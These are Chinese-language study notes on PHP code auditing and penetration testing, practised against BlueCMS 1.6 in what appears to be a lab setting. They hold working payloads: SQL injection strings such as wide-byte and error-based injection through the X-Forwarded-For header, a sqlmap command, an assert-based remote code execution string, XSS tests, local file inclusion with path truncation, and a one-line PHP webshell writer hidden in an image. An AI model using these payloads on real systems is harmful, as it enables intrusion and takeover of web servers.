代码审计思路:
:::::::::::::::::::::::::::::::::::::::::
渗透测试人员-----渗透测试---找漏洞---找Bug -衔接问题 技术
安全不孤立 漏洞一定存在
业务方便 -安全;;;
代码审计核心 知道代码如何执行;执行中可能产生的问题;;白盒审计;
通用型漏洞 CMS通杀漏洞不是仅仅代码审计能找到;
思路::1全文通读;;
2敏感函数定位;;存在危险函数的地方 反推;;
黑盒+白盒 代码审计放式 传参进去;构建合适语句进行尝试;
黑盒 1信息收集;
2寻找功能点传参;::::::::::::::::::::::::::::::
正常测试方法:1SQL注入 2XSS 3CSRF 4XXE 5SSRF 6文件上传
逻辑漏洞 : 1验证码绕过2密码找回3支付逻辑4越权
不成功1过滤(规则)2传参错误
白盒 :: 1变量覆盖 2文件包含3反序列化
实践:::::::::::::::::::
思路
安装重复安装双引号解析直接写shell$()
前台 用户注册 SQL注入 存储性XSS 逻辑错误宽字节
用户登录: 宽字节注入%df万能密码 cookie未加密
修改资料 :存储XSS ;sql注入;文件上传
评论 head注入 支付 本地文件包含
后台 万能密码 备份文件可猜测
1看文章复现;2看CNVD,3自己挖掘定位函数通读';;;
1环境搭建bluecms1.6
2安装版块install 多次安装??能破坏网站
3重复安装能进去后台 后台比前台弱 内网比外网弱;;
4重装也会产生安全问题;config.php
PHP版本5.5上双引号解析 "${};"
双引号解析${assert($_REQUEST[a])}
'")#测试 魔术引号 宽字节注入%df'
插入语句一次能否插入多条语句;
注册 万能密码 汉') or 1=1 # ------ a') or 1=1 # --------BP url解码:%df%27
5.2.17PHP版本
seeeion 变量覆盖 验证码对不上 php.ini
1117 session
网站存在sql注入 ,当页面存在代表可能很多页面存在.
admin' or 1=1#
url解码
bp改包: %df%27
备份 年月日 .sql
WWW /data/backup/
后台比前台弱;内网比外网弱
宽字节核心 魔术引号 在'"\前面加 \
影响 :传参GET\\\POST\\\\Cookie会被处理 试试请求头php heat
requie_once();
die($_GET['id']); 被转义
die($_SERVER["HTTP_USER_AGENT"]); /comment.php getip
全局搜索 先看路径 $_server getip --XSS <script>alert(1)</script>
利用事件处发 on
html实体 函数 htmlspecialchars() 转义 <>
bpIP::X-Forwarded_For: 1' and updatexml(1,concat(0x7e,(select database())),1),1)#
1' and updatexml(1,concat(0x7e,(select database())),1),1)#
X-Forwarded_For: 1'*,1)# py -2 sqlmap.py -r 1.txt --level 3
sqlmap报错 ::1的等级--level 3 ;;2闭合问题1'*,1)#
--dbs
前台 getshell 带走服务器 :::::::::::::::::::::::::
include $_POST['pay']
&pay=123
输出echo 123 index.php 包含漏洞
window 路径长度限制 ;; 截断5.3以下 有................................
256个字符
pay=../../.jpg .........................................
需要的书代码 木马 :<?php >
eval(file_put_contents('8.php','<?php eval($_REQUEST[a]) ?>')); ?>
cmd copy .jpg/b + 1.txt .jpg